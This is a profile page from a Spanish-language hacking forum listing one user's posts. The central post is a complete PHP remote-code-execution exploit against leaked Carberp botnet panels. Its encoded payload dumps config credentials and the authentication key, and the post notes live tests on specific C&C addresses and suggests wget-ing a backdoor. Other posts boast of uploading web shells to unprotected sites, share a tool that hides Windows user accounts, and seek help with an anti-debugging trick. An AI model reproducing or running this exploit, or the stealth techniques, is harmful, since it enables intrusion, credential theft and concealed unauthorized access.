Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - d1d4c

#1
Dudas y pedidos generales / [SOLUCIONADO] Bind Port?
Septiembre 12, 2013, 11:50:48 PM
Hola Comunidad,  tengo una pregunta que puedo no encontrar la respuesta en internet.
Que es y para que sirve Bind Port?, de esas que uno encuentra en algunas shell junto con el back connect ,(que si se para que funciona  :D ),

Aca les dejo algunos ejemplos de algunas shell que subi a una unas cuantas paginas que encontre por ahi sin seguridad  ::).



#2
Bugs y Exploits / Carberp Remote Code Execution
Junio 29, 2013, 10:44:44 PM
Todos estan mirando el codigo fuente de Carpberp, bootkit y otros componentes pero ¿Se han puesto a investigar el codigo fuente del panel?

Aqui hablare sobre una simple injeccion de codigo pero hay muchas mas vulnerabilidades en estos paneles filtrados.

Ejemplo: Codigo estupido que permite IP spoofing:




No, pero en serio la mejor vulnerabilidad es la de ejecucion remota de codigo(RCE), el tipo que escribio esto es realmente retrasado mental



Miren el bloque del eval()!

Oh que oportuno, algunos paneles de Carpberp  aparecieron en vx.vault


Ahora, escribamos un spl0it, pienso que la mayoria de ustedes vinieron por la prueba de concepto(PoC), verdad?

Código: php

Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable :(</font>"; }
}
}
?></td>
</tr>
</table>


La parte codificada hace un file_get_contents() al includes/config.php
Luego se conecta ala base de datos y muestra las credenciales de Carberp.(en caso de que no tengamos phpMyAdmin)
Pero esto seria inútil si nosotros no podemos mostrar la pagina de ingreso debido ala llave de Autenticacion, asi que el poc analiza el index.php y lo obtiene.
Genial payload huh?
Probemoslo ...

37.221.165.123:




91.214.202.117:



Lo he probado en algunos mas C&C(comanda y controla) y todo salio bien.
Y esto en un RCE asi que puedes ejecutar cosas interesantes como system('wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta');
para descargar una puerta trasera o cualquier cosa

Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Traducido por mi
#3
Aca comparto un video motivacional donde aparecen personas exitosas que tratan de fomentar la programacion.

Como me hubiera gustado recibir una motivacion asi y  aprender a programar desde pequeño :-\

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
C# - VB.NET / C# HideUser
Junio 25, 2013, 03:18:54 PM
Bueno aca les comparto un programa que su funcion es ocultar los usuarios de la pantalla de bienvenida de Windows y tambien en algunos aspectos en el SO como en el Panel de Control y UAC, pero logran aparecer con el comando net users

El programa no deshabilita las cuentas, las oculta,quedan igual de funcionales.



Aca sales las dos cuentas en la pantalla de inicio



Luego oculto usuario test




Exito,se oculto

Y si queremos volverlo a mostrar, lo siguiente debes de ejecutar



Lo dejo en proyecto visual studio, lo tienen que compilar
Si su equipo es de 32 bits, tienen que compilarlo en x86 y si es de 64 bits, en x64
Tambien hay una opcion de AnyCPU, para que funcione en los dos arquitecturas-esta esta seleccionada

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Hola comunidad, tengo un problema al tratar de compilar esto
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Es un truco de Anti-debugging (detecta 32-bit debuggers) que quisiera aplicar a mi programa, el problema es que al generar me sale

Código: text
[code]Error	1	error LNK2019: símbolo externo _DbgPrompt@12 sin resolver al que se hace referencia en la función _main
[/code]

El autor tambien ofrece un exe compilado y funciona perfecto, pero cuando añado el source a mi proyecto genera el error, busco por la red tratando de encontrar como solucionarlo pero casi no hay referencia de la funcion DbgPrompt
Depaso que me ayudan, se llevan a casa un truco anti-debugging  ;D


#6
Bueno aca les dejo una lista de las tools que he encontrado en la red para hacer reversing/decompiling/disassembler/patching/deobfuscation de aplicaciones .net.  :o

  .NET Reflector No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - de pago - trial

Dis# No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Pago - trial

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Pago - trial

Salamander .NET Decompiler No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Pago - demo online

.NET CodeReflect No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free

Monodis No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Open Source

ILSpy No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Open Source

dotPeek  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free

Just Decompile No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free

Explorer Suite No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free

  Dotnet IL Editor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free

ShowMyCode  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free Online

GrayWolf No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free

NetDasm No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Open Source

Zeta Resource Editor  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free

MSIL Disassembler (Ildasm.exe) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Free - Tambien viene instalado por defecto con Visual Studio



He probado algunos pero personalmente me quedo con GrayWolf, como reemplazo al .reflector que es de pago  :'( y aparte tiene un bonito DarkCode  ;D
#7
Presentaciones y cumpleaños / Hola!
Junio 12, 2013, 01:49:48 PM
Bueno me presento ante la comunidad, espero aprender mucho y tratar de aportar un poco de lo que se.
;D